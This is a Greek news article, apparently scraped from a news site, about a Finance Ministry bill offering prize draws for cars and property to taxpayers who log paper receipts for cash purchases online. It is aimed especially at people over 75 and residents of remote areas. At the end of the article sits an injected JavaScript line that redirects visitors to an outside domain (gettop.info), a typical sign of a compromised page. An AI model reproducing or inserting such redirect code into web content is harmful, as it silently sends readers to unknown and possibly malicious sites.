Ακριβά δώρα από το ΥΠΟΙΚ για χάρτινες αποδείξεις

0
6

 

Κίνητρα προς τους φορολογουμένους να ζητούν αποδείξεις και για τις αγορές που εξοφλούν με μετρητά προβλέπει το νομοσχέδιο του υπουργείου Οικονομικών για τις ηλεκτρονικές συναλλαγές, το οποίο είναι σχεδόν έτοιμο για κατάθεση στη Βουλή.

Σύμφωνα με πληροφορίες του «Ελεύθερου Τύπου», ένα από τα άρθρα του νομοσχεδίου για το «πλαστικό χρήμα» θα προβλέπει κληρώσεις ακριβών δώρων και για όσους φορολογουμένους:

α) ζητούν αποδείξεις για αγορές καταναλωτικών αγαθών ή παροχές υπηρεσιών μικρής αξίας, τις οποίες έχουν εξοφλήσει με μετρητά,

β) είναι μισθωτοί και συνταξιούχοι που εξαιρούνται από την υποχρέωση να εξοφλούν τις δαπάνες τους για αγορές αγαθών και παροχή υπηρεσιών με χρεωστικές ή πιστωτικές κάρτες ή μέσω e-banking προκειμένου να κατοχυρώνουν την έκπτωση φόρου των 1.900 – 2.100 ευρώ.

Σ’ αυτούς περιλαμβάνονται οι έχοντες ηλικία άνω των 75 ετών και οι κάτοικοι απομακρυσμένων – απομονωμένων περιοχών (ορεινών χωριών και νησιωτικών οικισμών της άγονης γραμμής). Κι αυτοί οι φορολογούμενοι θα εξακολουθούν να εξοφλούν με μετρητά όλες τις δαπάνες τους, είτε επειδή λόγω μεγάλης ηλικίας δεν έχουν καλή σχέση με την τεχνολογία του «πλαστικού χρήματος» είτε επειδή δεν έχουν τη δυνατότητα πρόσβασης σε μηχανήματα POS στα μέρη όπου κατοικούν.

Καταχώριση

Στους φορολογουμένους αυτών των περιπτώσεων θα δοθεί η δυνατότητα να καταχωρίζουν σε ειδική ηλεκτρονική φόρμα στο Διαδίκτυο τα στοιχεία των αποδείξεων που μαζεύουν από τις αγορές τους με μετρητά. Συγκεκριμένα, για κάθε απόδειξη που θα παίρνουν θα καλούνται να δηλώνουν στην ειδική ηλεκτρονική φόρμα 4 στοιχεία που αναγράφονται πάνω στο χαρτί της απόδειξης: τον ΑΦΜ της επιχείρησης με την οποία συναλλάχθηκαν, την ημερομηνία, την ώρα και το ποσό της συναλλαγής, σύμφωνα με τον «Ελεύθερο Τύπο».

Κάθε φορά που θα καταχωρίζουν στην ηλεκτρονική αυτή φόρμα αποδείξεις συνολικής αξίας πάνω από ένα όριο ποσού, π.χ. πάνω από 500 ή 1.000 ευρώ, θα τους αποστέλλεται ηλεκτρονικά, μέσω e-mail, ένας τυχερός αριθμός με τον οποίο θα μπορούν να συμμετέχουν σε τακτικές κληρώσεις δώρων μεγάλης αξίας.

Μία φορά το χρόνο θα κληρώνεται και γι’ αυτούς ένα ακίνητο, ενώ ανά μήνα ή δίμηνο ή τρίμηνο θα κληρώνονται Ι.Χ. αυτοκίνητα, τα οποία έχει στην κατοχή του το Δημόσιο και διατηρεί στις εγκαταστάσεις του ΟΔΔΥ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here